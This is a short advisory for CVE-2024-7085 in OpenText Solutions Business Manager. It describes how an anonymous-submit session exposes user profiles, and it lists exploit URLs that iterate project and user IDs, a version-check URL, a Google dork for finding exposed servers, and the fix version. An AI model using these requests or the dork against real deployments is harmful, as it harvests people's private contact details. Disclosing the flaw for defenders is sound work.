CVE-2024-7085 Exposure of Private Information OpenText SBM Exploit

From the project webpage: "OpenText™ Solutions Business Manager is enterprise-scale business process automation software. It helps IT quickly create, adapt, deploy, and govern process-based apps and workflows for humans and systems across the organization."

Summary

If the SMB application has anonymous submit enabled on any project, it creates a session for "Anonymous" user upon opening the AnonymousSubmitPage page. This session can be used to enumerate application users and retrieve personal information. Without the Anonymous user session, the vulnerable endpoint throws authentication failure.

Details listed: email address, full name, mobile phone, application role, etc.

Exploit

Step 1: Search for available AnonymousSubmitPage by iterating "projectid" parameter:

https://example.com/tmtrack/tmtrack.dll?AnonymousSubmitPage&projectid=1

Once a project with anonymous submit is found, copy cookies from the response for the next step.

Step 2: Search for users by iterating "userid" parameter:

https://example.com/tmtrack/tmtrack.dll?JSONPage&command=getuserprofilecard&userid=1

Affected versions

<12.2.1

Check version on: 

https://example.com/tmtrack/tmtrack.dll?shell=swc&StdPage&template=newwebadmin/aboutwebadmin.xml&noredirect=true

Google dork

inurl:tmtrack/tmtrack.dll

Mitigation

Update to version 12.2.1 or higher.